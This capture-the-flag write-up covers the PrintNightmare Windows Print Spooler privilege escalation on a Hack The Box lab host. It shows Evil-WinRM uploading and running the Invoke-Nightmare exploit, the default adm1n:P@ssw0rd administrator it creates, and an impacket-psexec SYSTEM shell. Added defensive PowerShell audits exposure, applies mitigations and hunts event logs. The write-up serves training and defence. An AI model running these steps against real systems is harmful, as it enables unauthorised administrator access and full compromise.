CVE-2021-1675


A vulnerability classified as critical was found in Microsoft Windows (operating system). Affected by this vulnerability is an unknown part of the Print Spooler component. It is known to affect confidentiality, integrity, and availability. Low-privileged users are able to add a printer and, specifically, supply a malicious driver for that printer, which results in escalation of privileges to SYSTEM-level access.

Overview of CVE-2021-1675/CVE-2021-34527

Testing


The vulnerability takes advantage of the Windows-native service called Print Spooler, which is enabled by default on all Windows machines (servers and endpoints).

The target system was running a spoolsv process, which gave it away, and it didn't seem like there was a patch installed for that.

On top of that, I already knew from the earlier MSRPC enumeration that the Spooler service was running.

PS C:\tmp> Get-Service Spooler
 
Status   Name               DisplayName                           
------   ----               -----------                           
Running  Spooler            Print Spooler
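From the defender's side, the same Get-Service check is the first step of an exposure audit. The script below is an added example, not part of the original write-up or of the exploit: it reports the Spooler service state, the Point and Print policy values Microsoft tied to this CVE, and the most recent hotfixes, and optionally applies Microsoft's two published mitigations. The -DisableSpooler and -RestrictDrivers switches are defined here; the registry path and value names are Microsoft's documented policy settings.

```powershell
# Added example, not part of the original write-up or of Invoke-Nightmare: audit a host for
# PrintNightmare exposure and optionally apply Microsoft's published mitigations for
# CVE-2021-34527. Run in an elevated PowerShell session. The -DisableSpooler and
# -RestrictDrivers switches are defined here; the registry path and value names are
# Microsoft's documented Point and Print policy settings.
param(
    [switch]$DisableSpooler,   # stop the service and keep it stopped (hosts that never print)
    [switch]$RestrictDrivers   # keep printing, but only admins may install printer drivers
)

$pp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

# 1. Service state: the write-up's Get-Service check, plus the startup type, which tells you
#    whether a stopped spooler simply comes back after the next reboot.
$svc = Get-Service -Name Spooler
"Spooler status: $($svc.Status), startup type: $($svc.StartType)"

# 2. Point and Print policy. NoWarningNoElevationOnInstall=1 or UpdatePromptSettings=1 lets
#    non-admin users install drivers without elevation, which Microsoft warns leaves even a
#    patched host exploitable. RestrictDriverInstallationToAdministrators=0 explicitly
#    re-enables non-admin driver installs; 1 (the default after the August 2021 updates) is safe.
$policy   = Get-ItemProperty -Path $pp -ErrorAction SilentlyContinue
$noWarn   = $policy.NoWarningNoElevationOnInstall
$noPrompt = $policy.UpdatePromptSettings
$restrict = $policy.RestrictDriverInstallationToAdministrators
"NoWarningNoElevationOnInstall             : $noWarn"
"UpdatePromptSettings                      : $noPrompt"
"RestrictDriverInstallationToAdministrators: $restrict   (blank = not set, OS default applies)"

# 3. Patch state: the script does not map KB numbers to this CVE, so it just surfaces the most
#    recent updates for a human to compare against Microsoft's advisory.
Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 5 HotFixID, InstalledOn

$exposed = ($svc.Status -eq 'Running') -and
           ($noWarn -eq 1 -or $noPrompt -eq 1 -or $restrict -eq 0)
if ($exposed) {
    Write-Warning 'Spooler is running with a permissive Point and Print policy: treat as exposed.'
}

if ($DisableSpooler) {
    Stop-Service -Name Spooler -Force
    Set-Service  -Name Spooler -StartupType Disabled
    'Spooler stopped and disabled.'
}

if ($RestrictDrivers) {
    New-Item -Path $pp -Force | Out-Null
    Set-ItemProperty -Path $pp -Name RestrictDriverInstallationToAdministrators -Value 1 -Type DWord
    Set-ItemProperty -Path $pp -Name NoWarningNoElevationOnInstall -Value 0 -Type DWord
    Set-ItemProperty -Path $pp -Name UpdatePromptSettings -Value 0 -Type DWord
    'Point and Print restricted to administrators.'
}
```

Run it with no switches first to see the report; on a print server that must keep printing, prefer -RestrictDrivers over -DisableSpooler. The policy values are only meaningful alongside the security update itself, which is why the hotfix list is shown rather than a verdict.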

Exploit (Invoke-Nightmare.ps1)


I found the exploit online; it's a PowerShell implementation of the original PrintNightmare exploit.

Exploitation


*Evil-WinRM* PS C:\tmp> upload CVE-2021-1675/CVE-2021-1675.ps1 C:\tmp\CVE-2021-1675.ps1
Info: Uploading CVE-2021-1675/CVE-2021-1675.ps1 to C:\tmp\CVE-2021-1675.ps1
 
 
Data: 238080 bytes of 238080 bytes copied
 
Info: Upload successful!

I transferred the PowerShell script to the target system over the existing WinRM session.

*Evil-WinRM* PS C:\tmp> . .\CVE-2021-1675.ps1

I then proceeded to import the exploit script into the current PowerShell session.

*Evil-WinRM* PS C:\tmp> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\svc-print\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_dcef07064d319714\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\svc-print\AppData\Local\Temp\nightmare.dll

Executing the exploit cmdlet. Successful exploitation should create an administrator user by default.

*Evil-WinRM* PS C:\tmp> net users adm1n
User name                    adm1n
Full Name                    adm1n
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            2/2/2023 2:27:48 PM
Password expires             Never
Password changeable          2/3/2023 2:27:48 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
 
Logon hours allowed          All
 
Local Group Memberships      *Administrators
Global Group memberships     *Domain Users
The command completed successfully.

The newly created user is indeed part of the Administrators group. The credential, by default, is adm1n:P@ssw0rd.
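The exploit output above shows the two things a defender can hunt for: a printer driver added through the spooler, then a new local administrator. The payload DLL is deleted from Temp at the end, so the event logs are the durable record. The script below is an added example, not part of the original write-up: it pulls driver add/update events from the PrintService operational log and account-management events from the Security log, and flags driver events that are followed by an account event within a short window. The -Hours and -Window parameters are defined here; the event IDs are Microsoft's.

```powershell
# Added example, not part of the original write-up: hunt for the traces Invoke-Nightmare leaves.
# The exploit adds a printer driver through the spooler and then creates a local admin, so this
# correlates (a) driver add/update events from the PrintService operational log with
# (b) local account creation and group-membership changes from the Security log.
# -Hours and -Window are parameters defined here; the event IDs are Microsoft's.
param(
    [int]$Hours  = 24,   # how far back to look
    [int]$Window = 10    # minutes between a driver event and an account event to call it correlated
)
$since = (Get-Date).AddHours(-$Hours)

# (a) 316 = "Printer driver ... was added or updated", 808 = the spooler failed to load a
#     plug-in module. Both are rare on a host that does not routinely receive new drivers.
$driverEvents = @(Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316, 808; StartTime = $since
} -ErrorAction SilentlyContinue)

# (b) 4720 = user account created, 4732 = member added to a security-enabled local group
#     (Administrators in the case above).
$accountEvents = @(Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4720, 4732; StartTime = $since
} -ErrorAction SilentlyContinue)

"Driver events : $($driverEvents.Count)"
"Account events: $($accountEvents.Count)"

foreach ($d in $driverEvents) {
    # account events that follow this driver event within the window
    $followers = @($accountEvents | Where-Object {
        $_.TimeCreated -ge $d.TimeCreated -and
        $_.TimeCreated -le $d.TimeCreated.AddMinutes($Window)
    })
    [pscustomobject]@{
        Time        = $d.TimeCreated
        DriverEvent = $d.Id
        Summary     = ($d.Message -split "`r?`n")[0]
        Correlated  = ($followers.Count -gt 0)
        AccountIds  = ($followers | Select-Object -ExpandProperty Id) -join ','
    }
}
```

Two prerequisites, or the script returns nothing: the PrintService operational log is disabled by default and must be turned on beforehand (wevtutil sl Microsoft-Windows-PrintService/Operational /e:true), and 4720/4732 only appear when Audit User Account Management and Audit Security Group Management are enabled in the audit policy. A Correlated = True row is worth a look even without a known bad driver name, because a legitimate driver roll-out rarely coincides with a new local administrator.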

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-1675]
└─$ impacket-psexec 'adm1n:P@ssw0rd@$IP' -target-ip $IP                        
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.193.....
[*] Found writable share ADMIN$
[*] Uploading file YSEbejMK.exe
[*] Opening SVCManager on 10.10.10.193.....
[*] Creating service tLjy on 10.10.10.193.....
[*] Starting service tLjy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
Fuse
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::786e:10c2:1173:5102
   Link-local IPv6 Address . . . . . : fe80::786e:10c2:1173:5102%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

Domain Level Compromise